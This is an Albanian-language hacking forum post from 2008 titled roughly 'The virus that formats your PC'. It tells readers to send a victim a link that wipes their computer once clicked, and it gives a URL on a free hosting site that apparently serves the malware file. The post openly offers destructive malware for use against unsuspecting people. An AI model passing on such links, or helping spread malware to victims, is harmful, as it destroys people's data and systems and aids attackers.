ForumPortalliPytėsoriKėrkoRegjistrohuLista AnėtarėveGrupet e Anėtarėveidentifikimi

Share | 
 

 Virusi qe ta bon PC format

Shiko temėn e mėparshme Shiko temėn pasuese Shko poshtė 
AutoriMesazh
ExTra
Webmaster
Webmaster
avatar

Numri i postimeve : 276
Registration date : 09/01/2008

MesazhTitulli: Virusi qe ta bon PC format   Thu Jan 10, 2008 2:50 pm

Ja Qon Qeket Link Viktimes edhe Aj duhet me Kliku ktu ne link edhe qaq Ma e Pat..http:\\dhcla.freehostia.com/Virus%20nga%20dhc
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
Virusi qe ta bon PC format
Shiko temėn e mėparshme Shiko temėn pasuese Mbrapsht nė krye 
Faqja 1 e 1
 Similar topics
-
» Hajdin Morina: Ngadhėnjimi i artit mbi format e ndėshkimit dhe tė dhunės shtetėrore

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: UnaBle Box :: HaCkinG-
Kėrce tek: